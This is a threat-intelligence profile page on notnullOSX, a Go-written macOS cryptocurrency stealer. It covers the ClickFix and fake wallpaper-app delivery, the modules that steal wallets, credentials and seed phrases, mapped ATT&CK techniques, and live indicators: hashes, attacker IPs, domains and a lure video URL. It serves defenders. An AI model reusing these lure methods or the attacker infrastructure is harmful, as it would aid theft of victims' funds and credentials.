notnullOSX
notnullOSX is a Go-written macOS information-stealing malware family first reported in early 2026 and observed by Moonlock Lab on March 30, 2026. It is designed primarily to steal cryptocurrency and selectively targets Mac users whose wallets reportedly hold more than $10,000. Reported victim geography at first detection included Vietnam, Taiwan, and Spain. The malware has been linked in reporting to the underground actor 0xFFF, later using the alias alh1mik.
Distribution relies on social engineering rather than an exploit chain. Reported infection paths include ClickFix-style lures that trick victims into pasting a base64-decoded Terminal command, fake protected Google Docs claiming an outdated Google API Connector or encryption issue, and malicious DMG installers masquerading as a WallSpace wallpaper application and promoted via a hijacked YouTube channel. The installer retrieves a Mach-O payload, removes the Gatekeeper quarantine attribute, creates persistence via LaunchAgent, and guides the victim to grant Full Disk Access, thereby bypassing normal macOS TCC protections for sensitive data access.
The malware is modular and has been described as both a stealer and a backdoor because it maintains persistent command-and-control and can receive follow-on instructions. Reported modules include SystemInfo, iMessageGrab, AppleNotesGrab, SafariCookiesGrab, CryptoWalletsGrab, BrowserHistoryGrab, BrowserGrab, FirefoxGrab, CredsGrab, TelegramGrab, and ReplaceApp. Confirmed theft targets mentioned in reporting include iMessages, Apple Notes, Safari cookies, browser passwords and history, Telegram Desktop session data, cryptocurrency wallet data, and developer secrets such as SSH keys, cloud credentials, Kubernetes configs, Docker configs, Terraform credentials, package manager tokens, and shell profiles. CryptoWalletsGrab reportedly targets desktop wallets including Bitcoin Core, Electrum, Wasabi, Exodus, and Atomic, as well as numerous browser wallet extensions.
A notable capability is the ReplaceApp module, which reportedly replaces legitimate wallet-management applications such as Ledger Live and Trezor with trojanized or counterfeit versions in order to capture seed phrases during setup or use. Reporting also states that notnullOSX maintains persistent communications with attacker infrastructure, including Firebase Realtime Database and downloads of modular components from cdn.filestackcontent.com.
High-confidence indicators and infrastructure mentioned in the reporting include SHA256 b0cd860f18b0136e063d7ef9a3c84d138a1a21dbea019605ce66a3a1fad91db4 for the main Mach-O binary, SHA256 070402c2c531aa3a87b9ccd080532a51d17b01d982b205fc4487246d58de8913 for a stage-1 bash installer, SHA256 636fa90aebab98534dcdbe50508ed8d3607c284c72f831a4503e223540d3f761 for a malicious DMG, IPs 111.90.149.111:8080 and 83.217.209.88, domains wallpapermacos.com, wallspaceapp.com, cdn.filestackcontent.com, and mactest-6b2ab-default-rtdb.firebaseio.com, and a malicious YouTube lure at https://www.youtube.com/watch?v=nbH5KJGYBHk. At time of publication, detection coverage was reportedly limited, with 10 of 64 VirusTotal vendors flagging the main sample.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Attacks with the nascent notnullOSX malware for macOS have been targeting cryptocurrency wallets containing over $10,000 in Taiwan, Vietnam, and Spain as part of a ClickFix campaign identified on Mar. 30... Multiple modules are then deployed by notnullOSX, the most concerning of which is ReplaceApp, which replaces the Trezor or Ledger Live hardware wallets with counterfeit iterations to facilitate real-time exfiltration of secret seed phrases.
Attacks with the nascent notnullOSX malware for macOS have been targeting cryptocurrency wallets containing over $10,000 in Taiwan, Vietnam, and Spain as part of a ClickFix campaign identified on Mar. 30... Multiple modules are then deployed by notnullOSX, the most concerning of which is ReplaceApp, which replaces the Trezor or Ledger Live hardware wallets with counterfeit iterations to facilitate real-time exfiltration of secret seed phrases.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Initial Access
Traffic to the malicious site was driven by a hijacked YouTube channel registered back in 2015 that had accumulated 50,000 views within two weeks of posting a single video.
Execution
5 techniques
Execution
The base64-encoded command shown to the victim decodes into a curl command that fetches a bash installer script from a remote server.
One path, called ClickFix, presents a Terminal command that, when pasted and run, silently downloads and installs the malware.
The second delivers a malicious DMG disk image containing a README, an install script, and a Terminal shortcut, packaged to look entirely routine.
Persistence
2 techniques
Persistence
Privilege Escalation
3 techniques
Privilege Escalation
Stealth
4 techniques
Stealth
The command presented by notnullOSX lures is base64-encoded ... Install.sh itself does not look like a script. At 299 KB, it presents a base64-encoded text.
The second path uses a fake disk image file called WallSpace.app, disguised as a legitimate macOS live wallpaper application.
Before a victim is approached, operators manually fill out a submission form identifying the target’s wallet address, social media profiles, and wallet balance. The panel documentation explicitly states the minimum threshold is $10,000, and submissions below that amount are simply not processed.
Defense Impairment
1 technique
Defense Impairment
Credential Access
5 techniques
Credential Access
This allows hackers to steal secret seed phrases as the user types them.
Once installed, notnullOSX operates silently and persistently, extracting data from iMessages, Apple Notes, Safari cookies, browser passwords, Telegram sessions, and a wide range of cryptocurrency wallets.
CredsGrab ... sweeps the home directory for SSH keys, cloud provider credentials, shell configs, package manager tokens, and DevOps tooling secrets
Discovery
2 techniques
Discovery
Dynamic analysis reveals the following confirmed modules executing in sequence: SystemInfo ...
Before a victim is approached, operators manually fill out a submission form identifying the target’s wallet address, social media profiles, and wallet balance. The panel documentation explicitly states the minimum threshold is $10,000, and submissions below that amount are simply not processed.
Collection
2 techniques
Collection
Command and Control
3 techniques
Command and Control
The implant also maintains a live connection back to the attacker’s server, meaning operators can send fresh instructions to infected machines long after the initial compromise.
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
17 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Go-written macOS stealer delivered via social engineering, fake Google documents, a fake WallSpace wallpaper app, and a hijacked YouTube channel. It steals iMessages, Apple Notes, Safari cookies, browser passwords, Telegram sessions, and cryptocurrency wallet data, and includes a ReplaceApp module that swaps legitimate wallet apps such as Ledger Live with malicious clones to capture seed phrases. It also establishes persistence via LaunchAgent and maintains live C2 connectivity.
A macOS malware used in a ClickFix campaign to target high-value cryptocurrency wallets. It is downloaded after victims are lured into executing a command in Terminal, gains total disk access, deploys multiple modules, and can replace Trezor or Ledger Live wallet applications with counterfeit versions to steal seed phrases in real time.
A targeted macOS information stealer written in Go that focuses on cryptocurrency holders. It uses ClickFix social engineering and malicious DMG installers, coerces victims into granting Full Disk Access to bypass TCC protections, downloads modular payloads to steal messages, notes, browser data, Telegram data, credentials, and crypto wallet information, can replace legitimate wallet apps with trojanized versions, and maintains a persistent WebSocket connection to a Firebase-hosted C2 for remote commands.
A macOS malware platform designed to steal cryptocurrency by targeting high-value victims, using social engineering and fake applications to gain execution, requesting Full Disk Access to read sensitive data such as iMessages, Apple Notes, and Safari credentials, maintaining backdoor access for follow-on commands, and replacing legitimate wallet-management apps like Ledger Live and Trezor with trojanized versions to capture seed phrases.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.